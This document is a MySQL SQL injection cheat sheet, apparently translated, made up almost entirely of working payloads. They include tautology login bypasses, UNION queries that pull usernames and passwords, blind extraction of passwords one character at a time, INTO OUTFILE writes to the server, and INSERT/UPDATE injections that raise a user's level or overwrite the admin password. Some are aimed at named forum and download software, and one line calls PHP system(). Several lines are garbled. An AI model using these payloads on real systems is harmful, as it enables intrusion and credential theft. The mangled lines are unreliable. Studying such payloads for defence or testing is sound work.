'OR 1 = 1
'or' 1 = 1
'/*  (opens a MySQL block comment; the rest of the application's query is ignored)
'%23  (URL-encoded `#`, which starts a MySQL line comment)
' and password='mypass
ID = -1 Union SELECT 1,1,1
ID = -1 Union Select Char (97), Char (97), CHAR (97)
ID = 1 Union SELECT 1,1,1 from membres
ID = 1 Union SELECT 1,1,1 from admin
ID = 1 Union SELECT 1,1,1 from user
Userid = 1 and password = mypass
Userid = 1 and MID (Password, 3, 1) = char (112)
Userid = 1 and MID (Password, 4, 1) = char (97)
AND ORD(MID(Password, 3, 1)) > 111  (ORD() returns the character code as an integer, so each position can be found with a binary search instead of trying every character)
' and length(password)='6  (probes the password length)
'and left (Password, 1) =' m
'and left (password, 2) =' my
... and so on, one character at a time
' union select 1, username, password from user /*
' union select 1, username, password from user /*
=' union select 1, username, password from user /*  (the payload can directly follow a `1` or a bare `=`)
99999 union select 1, username, password from user /*
' into outfile 'C:/File.txt'  (writes the result set to a file on the database server; the MySQL account needs the FILE privilege and the server process must be able to write to that path)
=' or 1=1 into outfile 'C:/FILE.TXT'
1' union select 1, username, password from user into outfile 'C:/user.txt'
SELECT Password from admins where login = 'john' into dumpfile '/path/to/site/file.txt'
ID = 'Union Select 1, Username, Password from User Into Outfile
ID = -1 union select 1, database(), version()  (fingerprints the current database name and server version)
Common tautology test statements (each WHERE clause always evaluates to true; useful to confirm an injection point before trying UNION queries):
SELECT * from Table Where 1 = 1
Select * from table where 'uuu' = 'uuu'
Select * from Table Where 1 <> 2
Select * from Table Where 3> 2
Select * from table where 2 <3
Select * from Table Where 1
SELECT * home where WHERE 1 1
Select * from table where 1--1
Select * from table where isnull (NULL)
Select * from Table Where Isnull (Cot (0))
Select * from table where 1 is not null
Select * from Table Where Null Is NULL
Select * from Table Where 2 Between 1 and 3
Select * from table where 'b' Between 'A' and 'c'
Select * from Table where 2 in (0, 1, 2)
Select * from Table Where Case When 1> 0 THEN 1 END
Example 1: Night Cat Download System (Ymdown) 1.0
ID = 1 Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1
Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_user
Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_User WHERE ID = 1
ID = 10000 Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from YMDOWN_USER WHERE ID = 1 And GroupID = 1
Union SELECT 1, Username, 1, Password, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_User WHERE ID = 1  (replace two of the placeholder columns with Username and Password to read the credentials directly)
Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_User WHERE ID = 1 AND ORD(MID(Password, 1, 1)) = 49  (tests whether the first password character is '1'; 49 is its ASCII code)
Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_User WHERE ID = 1 AND ORD(MID(Password, 2, 1)) = 50  (second character, '2')
Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_User WHERE ID = 1 AND ORD(MID(Password, 3, 1)) = 51  (third character, '3')
..............................................................
Example 2: Grey Track forum, event-ID parameter test (Meteor)
Union%20(select%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20where%20eventid%20=%2013)%20order%20by%20eventdate
Union% 20 (select% 20 allowsmilies, public, userid, '0000-0-0 ", pass (), version ()% 20FROM% 20Calendar_events% 20where% 20Eventid% 20 =% 2010)% 20EVENTDATE
Resulting statement, as the application assembles it:
Select Allowsmilies, Public, Userid, Eventdate, Event, Subject from Calendar_Events Where EventId = 1 Union (SELECT 1, 1, 1, 1, 1, 1 from user where userid = 1)
Select Allowsmilies, Public, Userid, Eventdate, Event, Subject from Calendar_Events Where EventId = 1 Union (SELECT 1, 1, 1, 1, 1, 1 from user where UserId = 1)
Union%20(SELECT%201,0,2,'1999-01-01','A',Password%20FROM%20User%20where%20Userid%20=%205)%20ORDER%20BY%20eventDate
Union%20(SELECT%201,0,12695,'1999-01-01','A',Password%20FROM%20User%20where%20Userid=13465)%20ORDER%20BY%20eventDate
Union%20(select%201,0,12695,'1999-01-01','a',userid%20FROM%20User%20where%20Username='Sandflee')%20ORDER%20BY%20EventDate  (returns the userid of the account named Sandflee)
(Select a from table_name where a = 10 and b = 1 ORDER BY a LIMIT 10)
SELECT * from article WHERE articleid = '$id' Union Select * from ...  (when the target table has the same number and types of columns, `select *` can be submitted directly)
Select * from article where articleid = '$id' Union SELECT 1, 1, 1, 1, 1, 1, 1 from ...  (otherwise pad the column list with constants until the column count matches)
Tricks: submit the following in forms, search boxes and similar inputs (`_` and `%` are LIKE wildcards):
"___"
".__"
"%"
%' order by ArticleID /*
%' order by ArticleID #
__' order by ArticleID /*
__' order by ArticleID #
$command = "dir c:/"; system($command);
Select * from article where articleid = '$id'  (string context: the payload must close the quote first)
Select * from article where articleid = $id  (numeric context: the payload needs no quote at all)
1' and 1=2 union select * from user where userid=1 /*  (submitted value; the resulting statement is:)
(Select * from article where articleid = '1' and 1 = 2 union select * from user where userid = 1 /*')
1 and 1 = 2 Union Select * from user where userid = 1
Setup: create the database and table, then insert one row:
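-- Test fixture for the injection examples on this page: one `user` table
-- holding a single account (userid 1, username 'swap', password 'mypass').
-- NOTE: the password is stored in clear text deliberately so the
-- character-by-character extraction payloads above can be demonstrated;
-- a real application must store a salted password hash instead.
CREATE DATABASE `injection`;
USE `injection`;

-- Table name is lower-case throughout (the original mixed `User`/`USER`;
-- on case-sensitive file systems MySQL treats those as different tables).
CREATE TABLE `user` (
    `userid`   INT(11)     NOT NULL AUTO_INCREMENT,
    `username` VARCHAR(20) NOT NULL DEFAULT '',
    `password` VARCHAR(20) NOT NULL DEFAULT '',
    PRIMARY KEY (`userid`)
);

-- Explicit column list so the insert does not break if columns are added later.
INSERT INTO `user` (`userid`, `username`, `password`)
VALUES (1, 'swap', 'mypass');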
Injection into an INSERT, e.g. through a user-registration form:
INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');
"INSERT INTO membres (login, password, nom, email, userlevel) VALUES ('$login', '$pass', '$nom', '$email', '1')"
INSERT INTO MEMBRES (Login, Password, NOM, Email, Userlevel) Values ('', ',' ',' ',' 3 ') #', '1')
"INSERT INTO membres SET login = '$login', password = '$pass', nom = '$nom', email = '$email'"
INSERT INTO membres SET login = '', password = '', nom = '', userlevel = '3', email = ''  (the nom field is submitted as `', userlevel='3`, adding a column assignment the form never exposed)
"INSERT INTO membres VALUES ('$id', '$login', '$pass', '$nom', '$email', '1')"
UPDATE user SET password = '$password', homepage = '$homepage' WHERE id = '$id'
UPDATE user SET password = 'md5(mypass)' WHERE username = 'admin' #', homepage = '$homepage' WHERE id = '$id'  (the password field is submitted as `md5(mypass)' where username='admin' #`; the `#` discards the original WHERE, so the admin row is overwritten. Note that, quoted as shown, `md5(mypass)` is stored as a literal string, not a hash)
"UPDATE membres SET password = '$pass', nom = '$nom', email = '$email' WHERE id = '$id'";
UPDATE membres SET password = '[pass]', nom = '', userlevel = '3', email = '' WHERE id = '[id]'
"UPDATE news SET votes = votes + 1, score = score + $note WHERE idnews = '$id'"  (`$note` is interpolated unquoted into an arithmetic expression, so it can be injected without breaking out of any quote)
Commonly used functions:
Database ()
user()
system_user()
Session_user ()
Current_user ()
such as:
UPDATE article SET title = $title WHERE articleid = 1  (the application's statement; `$title` is unquoted, so the function calls below can be submitted as the value directly)
Update Article Set Title = Database () Where id = 1
# Update the current database name to the Title field
Update article set title = user () where id = 1
# Update the current MySQL username to the title field
Update article set title = system_user () where id = 1
# Update the current MySQL username to the title field
Update article set title = session_user () where id = 1
# Update the current MySQL username to the title field
Update Article Set Title = current_user () Where id = 1
# Writes the account MySQL authenticated the session as (the user@host whose privileges apply), which can differ from user()
::::: :::::::::::::::::::::: ::::::::::::::
$req = "SELECT * FROM membres WHERE name LIKE '%$search%' ORDER BY name";
SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid #%' ORDER BY name  (the search term `%' order by uid #` closes the LIKE pattern and comments out the original ORDER BY)
SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid #%' ORDER BY name
SELECT uid FROM admins WHERE login = '' OR 'a' = 'a' AND password = '' OR 'a' = 'a'  (classic; AND binds tighter than OR, but the trailing `OR 'a'='a'` still makes the whole predicate true)
SELECT uid FROM admins WHERE login = '' OR admin_level = 1 #' AND password = ''
Select * from table where msg like '%hop'
SELECT uid FROM membres WHERE login = 'bob' AND password LIKE 'a%' #' AND password = ''  (the login field is submitted as `bob' and password like 'a%' #`, so the password can be guessed one prefix at a time)
SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid #%' ORDER BY name